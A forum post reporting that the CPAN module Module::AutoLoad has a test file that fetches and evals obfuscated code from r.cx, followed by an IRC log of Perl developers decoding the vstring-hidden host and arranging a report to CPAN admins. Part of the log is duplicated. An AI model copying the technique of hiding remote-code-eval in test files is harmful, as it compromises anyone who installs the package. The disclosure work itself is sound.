Not found by me but I'm not sure if anyone else has reported this yet. It was discussed in magnet#toolchain earlier today and brought forth by mst on who to contact about it.
It looks like Module::AutoLoad is running malicious code fetched from http://r.cx/, it might have originally been non-malicious but it appears to either be some kind of rootkit or iphone jailbreak or something currently. The trigger itself seems to be this test running: https://metacpan.org/source/BBB/Module-AutoLoad-0.06/t/05_rcx.t This appears to have been known about for a few years by some people but it's the first I'm seeing about it: https://stackoverflow.com/questions/35212843/perl-understanding-botstrap Below is the entire conversation from IRC about the discovery adsf 18:17:47 < haarg> regarding potentially malicious code on cpan 18:17:49 < haarg> https://metacpan.org/source/BBB/Module-AutoLoad-0.06/t/05_rcx.t 18:18:40 < Grinnz> oh god 18:19:02 < haarg> let me know if you figure out what it does 18:19:17 < Grinnz> i've figured out enough to wonder what the fuck this is doing here 18:19:32 < ether> what it *wants* to do is take the location of the current .t file, go up one dir and find contrib/RCX.pl and then run that script 18:19:32 < haarg> it's like 5 steps of insanity, most of which involve evaling code read straight off a random internet server 18:19:45 < haarg> yeah, now look at that script 18:19:47 < Grinnz> ether: yeah that script is where the scary part starts 18:20:26 * ether ಠ_ಠ 18:20:27 < Grinnz> also: 82.46.99.88.":1" 18:20:43 < Grinnz> ... this is concatenating a vstring with a string 18:20:48 < Grinnz> how would that ever work 18:21:14 < ether> I wonder what used to be at 82.46.99.88 18:22:09 < haarg> https://perlbot.pl/p/1133d2 18:22:29 < ether> he's up front about it being black magic in the docs 18:22:35 < ether> but this shit should have never been put on cpan 18:22:55 < Grinnz> "botstrap" is also cute 18:23:03 < haarg> it's not just "black magic" it's "active remote exploit" 18:23:52 < Grinnz> mst / klapperl ^ 18:24:06 < haarg> this is the eval: https://perlbot.pl/p/ui358q 18:24:12 < veesh> wow, that is not acceptable 18:24:17 < haarg> the unpack i mean 18:25:24 < haarg> next step: https://perlbot.pl/p/o1lk67 18:26:15 < haarg> next step: https://perlbot.pl/p/gkoxmt 18:26:52 < Grinnz> fyi that has been there since the first release of that dist in 2011 18:27:10 < Grinnz> though with different ips 18:30:03 < ether> 82.46.99.88.":1" = R.cX:1 18:30:11 < Grinnz> oh dear god 18:30:22 < Grinnz> so it's a vstring and not an ip at all 18:30:23 < ether> what does IO::Socket::INET do with that? is :1 a port number? 18:30:26 < Grinnz> yes 18:30:49 < ether> I missed haarg's first paste, https://perlbot.pl/p/1133d2 - that makes it more clear :) 18:30:56 < ether> jfc 18:31:08 < ether> burn it with fire 18:31:29 < haarg> i haven't traced the next step because it's pain to decode without running the whole thing 18:33:07 < veesh> https://stackoverflow.com/questions/35212843/perl-understanding-botstrap 18:35:21 < ether> I wonder if those guys ever did report this to modules@perl.org 18:35:25 < ether> narrator: they did not. 18:36:12 < ether> I don't see how r.cx could have been hacked and these eval chains still work 18:36:17 < ether> therefore, this was all intentional 18:36:29 < ether> burn it all down and bury this guy at sea 18:36:42 < ether> mst: would you agree? 18:38:44 < veesh> i just noticed now that the OP on the SO question was asking how to port the code to python 18:39:00 < veesh> i'm glad that all those people left perl 20 years ago 18:43:10 * Grinnz commented on the SO answer with some non-malicious solutions to this problem 18:44:59 * ether flagged for moderator attention to get it taken down 18:45:56 < haarg> i'm not having any luck tracing what the code does further than what i posted so far 18:46:07 < haarg> i need a VM or something 18:30:56 < ether> jfc 18:31:08 < ether> burn it with fire 18:31:29 < haarg> i haven't traced the next step because it's pain to decode without running the whole thing 18:33:07 < veesh> https://stackoverflow.com/questions/35212843/perl-understanding-botstrap 18:35:21 < ether> I wonder if those guys ever did report this to modules@perl.org 18:35:25 < ether> narrator: they did not. 18:36:12 < ether> I don't see how r.cx could have been hacked and these eval chains still work 18:36:17 < ether> therefore, this was all intentional 18:36:29 < ether> burn it all down and bury this guy at sea 18:36:42 < ether> mst: would you agree? 18:38:44 < veesh> i just noticed now that the OP on the SO question was asking how to port the code to python 18:39:00 < veesh> i'm glad that all those people left perl 20 years ago 18:43:10 * Grinnz commented on the SO answer with some non-malicious solutions to this problem 18:44:59 * ether flagged for moderator attention to get it taken down 18:45:56 < haarg> i'm not having any luck tracing what the code does further than what i posted so far 18:46:07 < haarg> i need a VM or something 18:47:11 < veesh> docker sounds like a good choice? 18:47:20 < Grinnz> sounds like a job for simcop2387 18:57:15 < ether> I tried searching for those tags - SHAtter GreenPois0n @GeoHot - but got lost in a spiral of l33tsp33k and had to lie down 19:03:01 -!- Pali [~p...@ip-89-102-255-175.net.upcbroadband.cz] has quit [Ping timeout: 360 seconds] 19:03:15 -!- brunoramos_ [~brunoramo@94.252.122.216] has joined #toolchain 19:05:55 -!- brunoramos [~brunoramo@94.252.122.22] has quit [Ping timeout: 360 seconds] 19:05:55 -!- brunoramos_ is now known as brunoramos 19:35:45 < Grinnz> http://neilb.org/2020/07/24/inconsistent-permissions.html - looks like the usual use of AUTHORITY is done by default now, neat 19:35:46 < dipsy> [ Inconsistent permissions on CPAN modules ] 19:35:49 < simcop2387> Grinnz: haarg: hrm? 19:36:20 < Grinnz> simcop2387: attempting to figure out what some malicious code does 19:36:58 < simcop2387> oh fun, yea the pastebin is hopefully nice for that, but it's one reason why i refuse to do a full cpan test run until i get a proper sandbox for it setup 19:38:30 < simcop2387> it looks almost like the EFI stuff in modern UEFI systems? like it's trying to load something into the vars there? 19:38:48 < simcop2387> or maybe it's just pretending to do so 19:39:34 < stigo> seems like a distraction to me, GreenPois0n pops up an old ios jailbrak for instance. 19:40:16 < simcop2387> yea after reading the rest of the links it looks like it's loading an iphone jail break of some kind. possibly to infect any attached devices 19:40:32 < Grinnz> it seems to me like the guy typed in "how to rootkit for noobs" in google and attached his code to that 19:40:47 < simcop2387> maybe 19:43:29 < stigo> almost like a ctf, interesting that r.cx:1 doesn't close the socket after delivering the first code part. 19:52:57 < stigo> some of r.cx's zone file: https://tpaste.us/ql09 20:17:25 < stigo> aha, this seems to be the tool used: http://www.perlobfuscator.com 20:17:26 < dipsy> [ Free Perl Obfuscator ] 20:23:20 < Grinnz> oh god 20:24:27 -!- haj [~thunde...@ip5f5ac614.dynamic.kabel-deutschland.de] has quit [Quit: haj] 20:27:21 < mohawk> at the bottom it offers a de-obfuscator 20:43:55 < simcop2387> stigo++ 21:40:17 < mst> yeah, somebody email mod...@perl.org, klapp...@cpan.org please 21:41:13 < simcop2387> if no one has done it yet, i'll do it shortly. 21:41:20 < mst> cheers 21:41:31 < simcop2387> i need to do some dishes and hand feed the cat first though 21:41:34 < mst> up to eyeballs in something else, would prefer somebody who was paying attention to do so 21:41:40 < mst> aye, fair
